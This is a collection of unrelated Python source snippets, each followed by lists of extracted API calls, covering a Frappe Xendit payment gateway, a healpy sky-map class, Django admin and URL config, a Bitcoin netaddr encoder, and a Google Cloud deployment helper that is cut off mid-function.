template = find_template('/404.html')
self.response.set_status(404)
self.response.write(template.render({}))
app = webapp2.WSGIApplication([
('/api/.*', ApiDoc),
('/.*', MainPage),
])
| [
"re.match",
"os.path.dirname",
"webapp2.WSGIApplication",
"re.sub",
"os.path.relpath"
] | [((2340, 2405), 'webapp2.WSGIApplication', 'webapp2.WSGIApplication', (["[('/api/.*', ApiDoc), ('/.*', MainPage)]"], {}), "([('/api/.*', ApiDoc), ('/.*', MainPage)])\n", (2363, 2405), False, 'import webapp2\n'), ((123, 148), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (138, 148), False, 'import os\n'), ((1708, 1731), 're.match', 're.match', (['pattern', 'path'], {}), '(pattern, path)\n', (1716, 1731), False, 'import re\n'), ((2071, 2109), 'os.path.relpath', 'os.path.relpath', (['self.request.path[1:]'], {}), '(self.request.path[1:])\n', (2086, 2109), False, 'import os\n'), ((1755, 1785), 're.sub', 're.sub', (['pattern', 'replace', 'path'], {}), '(pattern, replace, path)\n', (1761, 1785), False, 'import re\n')] |
# Copyright (c) 2022, kinkusuma and contributors
# For license information, please see license.txt
import frappe
from frappe.model.document import Document
from frappe import _
import json
from urllib.parse import urlencode
from frappe.utils import get_url, call_hook_method, cint, flt
from frappe.integrations.utils import make_get_request, make_post_request, create_request_log, create_payment_gateway
class xenditsettings(Document):
supported_currency = 'IDR'
def on_update(self):
create_payment_gateway('Xendit-' + self.gateway_name, settings='Xendit Settings', controller=self.gateway_name)
call_hook_method('payment_gateway_enabled', gateway='Xendit-' + self.gateway_name)
def validate_transaction_currency(self, currency):
if currency != self.supported_currency:
frappe.throw(_("Currency '{0}' is not supported").format(currency))
def get_payment_url(self, **kwargs):
return get_url("./xendit/checkout?{0}".format(urlencode(kwargs)))
def get_gateway_controller(doctype, docname):
reference_doc = frappe.get_doc(doctype, docname)
gateway_controller = frappe.db.get_value("Payment Gateway", reference_doc.payment_gateway, "gateway_controller")
return gateway_controller
| [
"frappe.db.get_value",
"frappe._",
"frappe.utils.call_hook_method",
"frappe.get_doc",
"urllib.parse.urlencode",
"frappe.integrations.utils.create_payment_gateway"
] | [((1025, 1057), 'frappe.get_doc', 'frappe.get_doc', (['doctype', 'docname'], {}), '(doctype, docname)\n', (1039, 1057), False, 'import frappe\n'), ((1080, 1175), 'frappe.db.get_value', 'frappe.db.get_value', (['"""Payment Gateway"""', 'reference_doc.payment_gateway', '"""gateway_controller"""'], {}), "('Payment Gateway', reference_doc.payment_gateway,\n 'gateway_controller')\n", (1099, 1175), False, 'import frappe\n'), ((491, 607), 'frappe.integrations.utils.create_payment_gateway', 'create_payment_gateway', (["('Xendit-' + self.gateway_name)"], {'settings': '"""Xendit Settings"""', 'controller': 'self.gateway_name'}), "('Xendit-' + self.gateway_name, settings=\n 'Xendit Settings', controller=self.gateway_name)\n", (513, 607), False, 'from frappe.integrations.utils import make_get_request, make_post_request, create_request_log, create_payment_gateway\n'), ((605, 692), 'frappe.utils.call_hook_method', 'call_hook_method', (['"""payment_gateway_enabled"""'], {'gateway': "('Xendit-' + self.gateway_name)"}), "('payment_gateway_enabled', gateway='Xendit-' + self.\n gateway_name)\n", (621, 692), False, 'from frappe.utils import get_url, call_hook_method, cint, flt\n'), ((941, 958), 'urllib.parse.urlencode', 'urlencode', (['kwargs'], {}), '(kwargs)\n', (950, 958), False, 'from urllib.parse import urlencode\n'), ((799, 835), 'frappe._', '_', (['"""Currency \'{0}\' is not supported"""'], {}), '("Currency \'{0}\' is not supported")\n', (800, 835), False, 'from frappe import _\n')] |
"""
LMap - a skymap of likelihoods.
The map will stored in self.map, and is in nested order.
"""
import logging
import numbers
import collections
import numpy as np
import healpy as hp
class LMap:
def __init__(self, a=0):
if isinstance(a, numbers.Number):
if a == 0:
self.map = np.ones(hp.nside2npix(2)) # placeholder
else:
# interpret as nside
self.map = np.ones(hp.nside2npix(a))
elif isinstance(a, (collections.Sequence, np.ndarray)):
self.map = np.array(a)
else:
logging.error('LMap.__init__: unrecognized type')
self.map = np.ones(hp.nside2npix(2)) # placeholder
def clear(self):
self.map = np.ones(len(self.map))
def copy(self):
return LMap(self.map.copy())
def combine(self, other):
if len(self.map) > len(other):
nside = hp.npix2nside(len(self.map))
ma = hp.ud_grade(np.array(other), nside,
order_in='NESTED', outer_out='NESTED')
elif len(self.map) < len(other):
nside = hp.npix2nside(len(other))
self.map = hp.ud_grade(np.array(self.map), nside,
order_in='NESTED', outer_out='NESTED')
ma = other
else:
ma = np.array(other)
self.map *= ma
| [
"numpy.array",
"logging.error",
"healpy.nside2npix"
] | [((503, 514), 'numpy.array', 'np.array', (['a'], {}), '(a)\n', (511, 514), True, 'import numpy as np\n'), ((531, 580), 'logging.error', 'logging.error', (['"""LMap.__init__: unrecognized type"""'], {}), "('LMap.__init__: unrecognized type')\n", (544, 580), False, 'import logging\n'), ((878, 893), 'numpy.array', 'np.array', (['other'], {}), '(other)\n', (886, 893), True, 'import numpy as np\n'), ((1203, 1218), 'numpy.array', 'np.array', (['other'], {}), '(other)\n', (1211, 1218), True, 'import numpy as np\n'), ((308, 324), 'healpy.nside2npix', 'hp.nside2npix', (['(2)'], {}), '(2)\n', (321, 324), True, 'import healpy as hp\n'), ((408, 424), 'healpy.nside2npix', 'hp.nside2npix', (['a'], {}), '(a)\n', (421, 424), True, 'import healpy as hp\n'), ((606, 622), 'healpy.nside2npix', 'hp.nside2npix', (['(2)'], {}), '(2)\n', (619, 622), True, 'import healpy as hp\n'), ((1070, 1088), 'numpy.array', 'np.array', (['self.map'], {}), '(self.map)\n', (1078, 1088), True, 'import numpy as np\n')] |
import os
def ensure_dir(path):
if not os.path.exists(path):
os.makedirs(path)
def get_instance(module, name, config, *args):
return getattr(module, config[name]['type'])(*args, **config[name]['args'])
def freeze_network(network):
for p in network.parameters():
p.requires_grad = False
def unfreeze_network(network):
for p in network.parameters():
p.requires_grad = True
| [
"os.path.exists",
"os.makedirs"
] | [((45, 65), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (59, 65), False, 'import os\n'), ((75, 92), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (86, 92), False, 'import os\n')] |
from django.contrib import admin
from modeltranslation.admin import TabbedTranslationAdmin
from .models import Person, Office, Tag
class PersonAdmin(TabbedTranslationAdmin):
list_display = ('name', 'surname', 'security_level', 'gender')
list_filter = ('security_level', 'tags', 'office', 'name', 'gender')
actions = ['copy_100']
def copy_100(self, request, queryset):
for item in queryset.all():
item.populate()
copy_100.short_description = 'Copy 100 objects with random data'
class PersonStackedInline(admin.TabularInline):
model = Person
extra = 0
class OfficeAdmin(admin.ModelAdmin):
inlines = (PersonStackedInline,)
list_display = ('office', 'address')
class TagAdmin(admin.ModelAdmin):
list_display = ('name',)
admin.site.register(Person, PersonAdmin)
admin.site.register(Office, OfficeAdmin)
admin.site.register(Tag, TagAdmin)
| [
"django.contrib.admin.site.register"
] | [((791, 831), 'django.contrib.admin.site.register', 'admin.site.register', (['Person', 'PersonAdmin'], {}), '(Person, PersonAdmin)\n', (810, 831), False, 'from django.contrib import admin\n'), ((832, 872), 'django.contrib.admin.site.register', 'admin.site.register', (['Office', 'OfficeAdmin'], {}), '(Office, OfficeAdmin)\n', (851, 872), False, 'from django.contrib import admin\n'), ((873, 907), 'django.contrib.admin.site.register', 'admin.site.register', (['Tag', 'TagAdmin'], {}), '(Tag, TagAdmin)\n', (892, 907), False, 'from django.contrib import admin\n')] |
#!/usr/bin/python3
from __future__ import absolute_import, division, print_function
import six
import context
import unittest
from acsemble.phantom import Phantom2d
from acsemble import maia
from acsemble import projection
import os
import numpy as np
from acsemble import config
def setup_module():
config.config_init()
PATH_HERE = os.path.abspath(os.path.dirname(__file__))
GOLOSIO_MAP = os.path.join(PATH_HERE, '..', 'acsemble', 'data', 'golosio_100.png')
YAMLFILE = os.path.join(PATH_HERE, '..', 'acsemble', 'data', 'golosio.yaml')
class OutgoingPhotonEnergyTests(unittest.TestCase):
def setUp(self):
self.phantom = Phantom2d(filename=GOLOSIO_MAP, yamlfile=YAMLFILE)
self.maia_d = maia.Maia()
def test_fluoro(self):
energy = projection.outgoing_photon_energy(
event_type = 'fluoro',
p = self.phantom,
q = 199, # outer corner
maia_d = self.maia_d,
el = 'Fe' # K_alpha is 6.398
)
self.assertAlmostEqual(energy, 6.398, places=2)
@unittest.skip
def test_rayleigh(self):
energy = projection.outgoing_photon_energy(
event_type = 'rayleigh',
p = self.phantom,
q = 199, # outer corner
maia_d=self.maia_d,
)
self.assertAlmostEqual(energy, self.phantom.energy)
@unittest.skip
def test_compton(self):
energy_outer = projection.outgoing_photon_energy(
event_type = 'compton',
p = self.phantom,
q = 199, # outer corner
maia_d=self.maia_d,
)
energy_inner = projection.outgoing_photon_energy(
event_type = 'compton',
p = self.phantom,
q = 248, # inner corner
maia_d=self.maia_d,
)
self.assertTrue(energy_outer > energy_inner) # because backscatter
self.assertTrue(energy_outer < self.phantom.energy)
# self.assertAlmostEqual(energy_outer, 14.324, places=3) # Maia Rev A
self.assertAlmostEqual(energy_outer, 14.282, places=3) # For Maia Rev C
def tearDown(self):
del self.phantom
del self.maia_d
if __name__ == "__main__" :
import sys
from numpy.testing import run_module_suite
run_module_suite(argv=sys.argv)
| [
"os.path.join",
"acsemble.config.config_init",
"acsemble.maia.Maia",
"os.path.dirname",
"acsemble.phantom.Phantom2d",
"numpy.testing.run_module_suite",
"acsemble.projection.outgoing_photon_energy"
] | [((397, 465), 'os.path.join', 'os.path.join', (['PATH_HERE', '""".."""', '"""acsemble"""', '"""data"""', '"""golosio_100.png"""'], {}), "(PATH_HERE, '..', 'acsemble', 'data', 'golosio_100.png')\n", (409, 465), False, 'import os\n'), ((477, 542), 'os.path.join', 'os.path.join', (['PATH_HERE', '""".."""', '"""acsemble"""', '"""data"""', '"""golosio.yaml"""'], {}), "(PATH_HERE, '..', 'acsemble', 'data', 'golosio.yaml')\n", (489, 542), False, 'import os\n'), ((305, 325), 'acsemble.config.config_init', 'config.config_init', ([], {}), '()\n', (323, 325), False, 'from acsemble import config\n'), ((356, 381), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (371, 381), False, 'import os\n'), ((2308, 2339), 'numpy.testing.run_module_suite', 'run_module_suite', ([], {'argv': 'sys.argv'}), '(argv=sys.argv)\n', (2324, 2339), False, 'from numpy.testing import run_module_suite\n'), ((641, 691), 'acsemble.phantom.Phantom2d', 'Phantom2d', ([], {'filename': 'GOLOSIO_MAP', 'yamlfile': 'YAMLFILE'}), '(filename=GOLOSIO_MAP, yamlfile=YAMLFILE)\n', (650, 691), False, 'from acsemble.phantom import Phantom2d\n'), ((714, 725), 'acsemble.maia.Maia', 'maia.Maia', ([], {}), '()\n', (723, 725), False, 'from acsemble import maia\n'), ((771, 882), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""fluoro"""', 'p': 'self.phantom', 'q': '(199)', 'maia_d': 'self.maia_d', 'el': '"""Fe"""'}), "(event_type='fluoro', p=self.phantom, q=\n 199, maia_d=self.maia_d, el='Fe')\n", (804, 882), False, 'from acsemble import projection\n'), ((1127, 1231), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""rayleigh"""', 'p': 'self.phantom', 'q': '(199)', 'maia_d': 'self.maia_d'}), "(event_type='rayleigh', p=self.phantom, q=\n 199, maia_d=self.maia_d)\n", (1160, 1231), False, 'from acsemble import projection\n'), ((1445, 1548), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""compton"""', 'p': 'self.phantom', 'q': '(199)', 'maia_d': 'self.maia_d'}), "(event_type='compton', p=self.phantom, q=\n 199, maia_d=self.maia_d)\n", (1478, 1548), False, 'from acsemble import projection\n'), ((1654, 1757), 'acsemble.projection.outgoing_photon_energy', 'projection.outgoing_photon_energy', ([], {'event_type': '"""compton"""', 'p': 'self.phantom', 'q': '(248)', 'maia_d': 'self.maia_d'}), "(event_type='compton', p=self.phantom, q=\n 248, maia_d=self.maia_d)\n", (1687, 1757), False, 'from acsemble import projection\n')] |
from rest_framework.response import Response
from django.core import serializers
class SessionResponseMixin(object):
'''
Class: SessionResponseMixin:
Arguments:
- Object: mixin object
Defenition:
Creates a valid object that needs to be returned
as the response for the client request.
Return params:
- Reponse: contains json data and status of the request.
'''
def render_to_response(self, user, token, status, error, token_expiry=None):
response_data = dict(id=None, username='', email='', first_name='', last_name='', profile='', is_authenticated=False,
is_admin=False, token=token, error=error, token_expiry=token_expiry)
if user:
profile = dict()
if hasattr(user, 'profile'):
profile = user.profile.getObject()
response_data = dict(id=user.id, username=user.username, profile=profile, email=user.email, first_name=user.first_name, last_name=user.last_name, is_authenticated=user.is_authenticated,
is_admin=user.is_superuser, token=token, error=error, token_expiry=token_expiry)
return Response(response_data, status)
| [
"rest_framework.response.Response"
] | [((1223, 1254), 'rest_framework.response.Response', 'Response', (['response_data', 'status'], {}), '(response_data, status)\n', (1231, 1254), False, 'from rest_framework.response import Response\n')] |
import logging
def get_logger(name: str, logfile: str = "log.txt") -> logging.Logger:
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# ファイルハンドラの作成
file_handler = logging.FileHandler(logfile)
file_handler.setLevel(logging.DEBUG)
file_handler_formatter = logging.Formatter(
"%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(message)s"
)
file_handler.setFormatter(file_handler_formatter)
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.DEBUG)
console_handler_formatter = logging.Formatter(
"%(asctime)s.%(msecs)-3d - %(levelname)s - %(message)s",
"%Y-%m-%d %H:%M:%S",
)
console_handler.setFormatter(console_handler_formatter)
logger.addHandler(file_handler)
logger.addHandler(console_handler)
return logger
| [
"logging.getLogger",
"logging.Formatter",
"logging.StreamHandler",
"logging.FileHandler"
] | [((101, 124), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (118, 124), False, 'import logging\n'), ((198, 226), 'logging.FileHandler', 'logging.FileHandler', (['logfile'], {}), '(logfile)\n', (217, 226), False, 'import logging\n'), ((297, 394), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(message)s"""'], {}), "(\n '%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(message)s')\n", (314, 394), False, 'import logging\n'), ((481, 504), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (502, 504), False, 'import logging\n'), ((581, 680), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s.%(msecs)-3d - %(levelname)s - %(message)s"""', '"""%Y-%m-%d %H:%M:%S"""'], {}), "('%(asctime)s.%(msecs)-3d - %(levelname)s - %(message)s',\n '%Y-%m-%d %H:%M:%S')\n", (598, 680), False, 'import logging\n')] |
from django.urls import path
from . import views
from . import gviews
app_name='polls'
urlpatterns = [
# ex: /polls/
path('', views.index, name='index'),
# ex: /polls/5/
path('<int:question_id>/', views.detail, name='detail'),
# ex: /polls/5/results/
path('<int:question_id>/results/', views.results, name='results'),
# ex: /polls/5/vote/
path('<int:question_id>/vote/', views.vote, name='vote'),
path('v2/', gviews.IndexView.as_view(), name='index'),
path('v2/<int:pk>/', gviews.DetailView.as_view(), name='detail'),
path('v2/<int:pk>/results/', gviews.ResultsView.as_view(), name='results'),
path('v2/<int:question_id>/vote/', gviews.vote, name='vote'),
] | [
"django.urls.path"
] | [((128, 163), 'django.urls.path', 'path', (['""""""', 'views.index'], {'name': '"""index"""'}), "('', views.index, name='index')\n", (132, 163), False, 'from django.urls import path\n'), ((189, 244), 'django.urls.path', 'path', (['"""<int:question_id>/"""', 'views.detail'], {'name': '"""detail"""'}), "('<int:question_id>/', views.detail, name='detail')\n", (193, 244), False, 'from django.urls import path\n'), ((278, 343), 'django.urls.path', 'path', (['"""<int:question_id>/results/"""', 'views.results'], {'name': '"""results"""'}), "('<int:question_id>/results/', views.results, name='results')\n", (282, 343), False, 'from django.urls import path\n'), ((374, 430), 'django.urls.path', 'path', (['"""<int:question_id>/vote/"""', 'views.vote'], {'name': '"""vote"""'}), "('<int:question_id>/vote/', views.vote, name='vote')\n", (378, 430), False, 'from django.urls import path\n'), ((646, 706), 'django.urls.path', 'path', (['"""v2/<int:question_id>/vote/"""', 'gviews.vote'], {'name': '"""vote"""'}), "('v2/<int:question_id>/vote/', gviews.vote, name='vote')\n", (650, 706), False, 'from django.urls import path\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import struct
from socket import inet_aton, inet_ntoa
from typing import NamedTuple
from .Struct import Struct
Payload = NamedTuple('Payload', (('ip', str), ('port', int), ('services', int)))
class Netaddr(Payload, Struct):
"""
Network address structure for use in Bitcoin protocol messages
.. Network address structure in Bitcoin wiki:
https://en.bitcoin.it/wiki/Protocol_documentation#Network_address
"""
def __str__(self) -> str:
return 'netaddr:({ip}:{port}, s: {s:b})'.format(ip=self.ip,
port=self.port,
s=self.services,)
def __repr__(self) -> str:
return str(self)
def encode(self) -> bytes:
"""
Encode object ot Bitcoin's netaddr structure
Returns
-------
bytes
encoded message
"""
p = bytearray() # type: bytearray
p.extend(struct.pack('<q', self.services))
p.extend(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff')
p.extend(struct.pack('>4sH', inet_aton(self.ip), self.port))
return bytes(p)
@staticmethod
def decode(n: bytes) -> Payload:
"""
Decode netaddr from bytes
Parameters
----------
n : bytes
netaddr structure to decode
Returns
-------
NamedTuple (Payload)
NamedTuple with all parsed fields (services, ipaddr, port)
"""
services = struct.unpack('<Q', n[:8])[0] # type: int
(addr, port) = struct.unpack('>4sH', n[-6:]) # type: bytes, int
ip = inet_ntoa(addr) # type: interpret
return Payload(ip=ip, port=port, services=services)
| [
"struct.pack",
"struct.unpack",
"socket.inet_aton",
"socket.inet_ntoa",
"typing.NamedTuple"
] | [((171, 241), 'typing.NamedTuple', 'NamedTuple', (['"""Payload"""', "(('ip', str), ('port', int), ('services', int))"], {}), "('Payload', (('ip', str), ('port', int), ('services', int)))\n", (181, 241), False, 'from typing import NamedTuple\n'), ((1663, 1692), 'struct.unpack', 'struct.unpack', (['""">4sH"""', 'n[-6:]'], {}), "('>4sH', n[-6:])\n", (1676, 1692), False, 'import struct\n'), ((1726, 1741), 'socket.inet_ntoa', 'inet_ntoa', (['addr'], {}), '(addr)\n', (1735, 1741), False, 'from socket import inet_aton, inet_ntoa\n'), ((1028, 1060), 'struct.pack', 'struct.pack', (['"""<q"""', 'self.services'], {}), "('<q', self.services)\n", (1039, 1060), False, 'import struct\n'), ((1597, 1623), 'struct.unpack', 'struct.unpack', (['"""<Q"""', 'n[:8]'], {}), "('<Q', n[:8])\n", (1610, 1623), False, 'import struct\n'), ((1169, 1187), 'socket.inet_aton', 'inet_aton', (['self.ip'], {}), '(self.ip)\n', (1178, 1187), False, 'from socket import inet_aton, inet_ntoa\n')] |
from rake_nltk import Rake
import nltk
from nltk.stem import WordNetLemmatizer
from qualkit.stopwords import stopwords
nltk.download('wordnet')
# initiate nltk lemmatiser
lemma = WordNetLemmatizer()
r = Rake(stopwords=stopwords, min_length=1, max_length=4)
def rake_implement(x, r):
r.extract_keywords_from_text(x)
return r.get_ranked_phrases()
def add_keywords(df, column):
df = df.copy()
df['keywords'] = df[column].apply(lambda x: rake_implement(x, r))
df['keywords'] = df['keywords'].apply(lambda x: [lemma.lemmatize(y) for y in x])
df = df.explode('keywords')
df.dropna(subset=['keywords'], inplace=True)
return df
| [
"rake_nltk.Rake",
"nltk.stem.WordNetLemmatizer",
"nltk.download"
] | [((121, 145), 'nltk.download', 'nltk.download', (['"""wordnet"""'], {}), "('wordnet')\n", (134, 145), False, 'import nltk\n'), ((182, 201), 'nltk.stem.WordNetLemmatizer', 'WordNetLemmatizer', ([], {}), '()\n', (199, 201), False, 'from nltk.stem import WordNetLemmatizer\n'), ((207, 260), 'rake_nltk.Rake', 'Rake', ([], {'stopwords': 'stopwords', 'min_length': '(1)', 'max_length': '(4)'}), '(stopwords=stopwords, min_length=1, max_length=4)\n', (211, 260), False, 'from rake_nltk import Rake\n')] |
from termcolor import colored
v = float(input('Velocidade do carro, em Km/h: '))
if v > 80:
print(colored('Ultrapassou a velocidade de 80Km/h, multa de: R${}'.format(7 * (v - 80)), 'red'))
else:
print(colored('Tenha um bom dia, dirija com seguraça!', 'green'))
| [
"termcolor.colored"
] | [((210, 268), 'termcolor.colored', 'colored', (['"""Tenha um bom dia, dirija com seguraça!"""', '"""green"""'], {}), "('Tenha um bom dia, dirija com seguraça!', 'green')\n", (217, 268), False, 'from termcolor import colored\n')] |
import json
import subprocess
import sys
from abc import abstractmethod
from pathlib import Path
from pprint import pformat
from time import sleep
from typing import Sequence, MutableMapping, Union, Any, Mapping, MutableSequence
import pymysql
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from pymysql import Connection
class SqlExecutor:
def __init__(self, svc: 'ExternalServices') -> None:
super().__init__()
self._svc: 'ExternalServices' = svc
@abstractmethod
def open(self) -> None:
raise NotImplementedError()
@abstractmethod
def close(self) -> None:
raise NotImplementedError()
@abstractmethod
def execute_sql(self, sql: str):
raise NotImplementedError()
@abstractmethod
def execute_sql_script(self, path: str):
raise NotImplementedError()
class ProxySqlExecutor(SqlExecutor):
def __init__(self, svc: 'ExternalServices', project_id: str, instance: str, password: str, region: str) -> None:
super().__init__(svc=svc)
self._project_id: str = project_id
self._instance: str = instance
self._username: str = 'root'
self._password: str = password
self._region: str = region
self._proxy_process: subprocess.Popen = None
self._connection: Connection = None
def open(self) -> None:
self._svc.update_gcp_sql_user(project_id=self._project_id, instance=self._instance, password=self._password)
self._proxy_process: subprocess.Popen = \
subprocess.Popen([f'/usr/local/bin/cloud_sql_proxy',
f'-instances={self._project_id}:{self._region}:{self._instance}=tcp:3306',
f'-credential_file=/deployster/service-account.json'])
try:
self._proxy_process.wait(2)
raise Exception(f"could not start Cloud SQL Proxy!")
except subprocess.TimeoutExpired:
pass
print(f"Connecting to MySQL...", file=sys.stderr)
self._connection: Connection = pymysql.connect(host='localhost',
port=3306,
user=self._username,
password=self._password,
db='INFORMATION_SCHEMA',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
def close(self) -> None:
try:
self._connection.close()
finally:
self._proxy_process.terminate()
def execute_sql(self, sql: str) -> Sequence[dict]:
with self._connection.cursor() as cursor:
cursor.execute(sql)
return [row for row in cursor.fetchall()]
def execute_sql_script(self, path: str):
command = \
f"/usr/bin/mysql --user={self._username} " \
f" --password={self._password} " \
f" --host=127.0.0.1 information_schema < {path}"
subprocess.run(command, shell=True, check=True)
def region_from_zone(zone: str) -> str:
return zone[0:zone.rfind('-')]
class ExternalServices:
def __init__(self) -> None:
super().__init__()
self._gcp_service_cache: MutableMapping[str, Any] = {}
def _get_gcp_service(self, service_name, version) -> Any:
service_key = service_name + '_' + version
if service_key not in self._gcp_service_cache:
self._gcp_service_cache[service_key] = build(serviceName=service_name, version=version)
return self._gcp_service_cache[service_key]
def find_gcp_project(self, project_id: str) -> Union[None, dict]:
filter: str = f"name:{project_id}"
result: dict = self._get_gcp_service('cloudresourcemanager', 'v1').projects().list(filter=filter).execute()
if 'projects' not in result:
return None
projects: Sequence[dict] = result['projects']
if len(projects) == 0:
return None
elif len(projects) > 1:
raise Exception(f"too many GCP projects matched filter '{filter}'")
else:
return projects[0]
def find_gcp_project_billing_info(self, project_id: str) -> Union[None, dict]:
try:
service = self._get_gcp_service('cloudbilling', 'v1')
return service.projects().getBillingInfo(name=f"projects/{project_id}").execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def find_gcp_project_enabled_apis(self, project_id: str) -> Sequence[str]:
service = self._get_gcp_service('servicemanagement', 'v1')
result: dict = service.services().list(consumerId=f'project:{project_id}').execute()
if 'services' in result:
return [api['serviceName'] for api in result['services']]
else:
return []
def create_gcp_project(self, body: dict) -> None:
service = self._get_gcp_service('cloudresourcemanager', 'v1').projects()
self.wait_for_gcp_resource_manager_operation(service.create(body=body).execute())
def update_gcp_project(self, project_id: str, body: dict) -> None:
service = self._get_gcp_service('cloudresourcemanager', 'v1').projects()
self.wait_for_gcp_resource_manager_operation(service.update(projectId=project_id, body=body).execute())
def update_gcp_project_billing_info(self, project_id: str, body: dict) -> None:
service = self._get_gcp_service('cloudbilling', 'v1').projects()
service.updateBillingInfo(name=f'projects/{project_id}', body=body).execute()
def enable_gcp_project_api(self, project_id: str, api: str) -> None:
self.wait_for_gcp_service_manager_operation(
self._get_gcp_service('servicemanagement', 'v1').services().enable(serviceName=api, body={
'consumerId': f"project:{project_id}"
}).execute())
def disable_gcp_project_api(self, project_id: str, api: str) -> None:
self.wait_for_gcp_service_manager_operation(
self._get_gcp_service('servicemanagement', 'v1').services().disable(serviceName=api, body={
'consumerId': f"project:{project_id}"
}).execute())
def wait_for_gcp_service_manager_operation(self, result):
if 'response' in result:
return result['response']
operations_service = self._get_gcp_service('servicemanagement', 'v1').operations()
while True:
sleep(5)
result = operations_service.get(name=result['name']).execute()
if 'done' in result and result['done']:
if 'response' in result:
return result['response']
elif 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
raise Exception("UNKNOWN ERROR: %s" % json.dumps(result))
def wait_for_gcp_resource_manager_operation(self, result):
if 'response' in result:
return result['response']
operations_service = self._get_gcp_service('cloudresourcemanager', 'v1').operations()
while True:
sleep(5)
result = operations_service.get(name=result['name']).execute()
if 'done' in result and result['done']:
if 'response' in result:
return result['response']
elif 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
raise Exception("UNKNOWN ERROR: %s" % json.dumps(result))
def find_service_account(self, project_id: str, email: str):
try:
sa_resource_name: str = f"projects/-/serviceAccounts/{email}"
return self._get_gcp_service('iam', 'v1').projects().serviceAccounts().get(name=sa_resource_name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def create_service_account(self, project_id: str, email: str, display_name: str):
self._get_gcp_service('iam', 'v1').projects().serviceAccounts().create(name=f"projects/{project_id}", body={
'accountId': email[0:email.find('@')],
'serviceAccount': {
'displayName': display_name if display_name else email[0:email.find('@')].capitalize()
}
}).execute()
def update_service_account_display_name(self, project_id: str, email: str, display_name: str, etag: str):
sa_resource_name: str = f"projects/-/serviceAccounts/{email}"
self._get_gcp_service('iam', 'v1').projects().serviceAccounts().update(name=sa_resource_name, body={
'displayName': display_name if display_name else email[0:email.find('@')].capitalize(),
'etag': etag
}).execute()
def get_project_iam_policy(self, project_id: str):
service = self._get_gcp_service('cloudresourcemanager', 'v1')
return service.projects().getIamPolicy(resource=project_id, body={}).execute()
def update_project_iam_policy(self, project_id: str, etag: str, bindings: Sequence[dict], verbose: bool = False):
existing_policy: dict = self.get_project_iam_policy(project_id=project_id)
print(f"About to update IAM policy for project '{project_id}'.\n"
f"For reference, due to the sensitivity of this operation, here is the current IAM policy bindings:\n"
f"\n"
f"{pformat(existing_policy['bindings'])}\n"
f"\n"
f"The new IAM policy bindings will be:\n"
f"{pformat(bindings)}")
service = self._get_gcp_service('cloudresourcemanager', 'v1')
service.projects().setIamPolicy(resource=project_id, body={
'policy': {
'bindings': bindings,
'etag': etag
}
}).execute()
def get_gcp_sql_allowed_tiers(self, project_id: str) -> Mapping[str, str]:
sql_service = self._get_gcp_service('sqladmin', 'v1beta4')
return {tier['tier']: tier
for tier in sql_service.tiers().list(project=project_id).execute()['items']
if tier['tier'].startswith('db-')}
def get_gcp_sql_allowed_flags(self) -> Mapping[str, str]:
service = self._get_gcp_service('sqladmin', 'v1beta4')
return {flag['name']: flag for flag in service.flags().list(databaseVersion='MYSQL_5_7').execute()['items']}
def get_gcp_sql_instance(self, project_id: str, instance_name: str):
# using "instances().list(..)" because "get" throws 403 when instance does not exist
# also, it seems the "filter" parameter for "list" does not work; so we fetch all instances and filter here
result = self._get_gcp_service('sqladmin', 'v1beta4').instances().list(project=project_id).execute()
if 'items' in result:
for instance in result['items']:
if instance['name'] == instance_name:
return instance
return None
def get_gcp_sql_users(self, project_id: str, instance_name: str) -> Sequence[dict]:
users_service = self._get_gcp_service('sqladmin', 'v1beta4').users()
result = users_service.list(project=project_id, instance=instance_name).execute()
users: MutableSequence[dict] = []
if 'items' in result:
for user in result['items']:
users.append({'name': user['name'], 'password': user['password'] if 'password' in user else None})
return users
def create_gcp_sql_user(self, project_id: str, instance_name: str, user_name: str, password: str) -> None:
users_service = self._get_gcp_service('sqladmin', 'v1beta4').users()
result = users_service.insert(project=project_id, instance=instance_name, body={
'name': user_name,
'password': password
}).execute()
def create_gcp_sql_instance(self, project_id: str, body: dict) -> None:
sql_service = self._get_gcp_service('sqladmin', 'v1beta4')
try:
op = sql_service.instances().insert(project=project_id, body=body).execute()
self.wait_for_gcp_sql_operation(project_id=project_id, operation=op)
except HttpError as e:
status = e.resp.status
if status == 409:
raise Exception(f"failed creating SQL instance, possibly due to instance name reuse (you can't "
f"reuse an instance name for a week after its deletion)") from e
else:
raise
def patch_gcp_sql_instance(self, project_id: str, instance: str, body: dict) -> None:
service = self._get_gcp_service('sqladmin', 'v1beta4')
op = service.instances().patch(project=project_id, instance=instance, body=body).execute()
self.wait_for_gcp_sql_operation(project_id=project_id, operation=op)
def update_gcp_sql_user(self, project_id: str, instance: str, password: str) -> None:
service = self._get_gcp_service('sqladmin', 'v1beta4')
op = service.users().update(project=project_id, instance=instance, host='%', name='root', body={
'password': password
}).execute()
self.wait_for_gcp_sql_operation(project_id=project_id, operation=op)
def create_gcp_sql_executor(self, **kwargs) -> SqlExecutor:
return ProxySqlExecutor(svc=self,
project_id=kwargs['project_id'],
instance=kwargs['instance'],
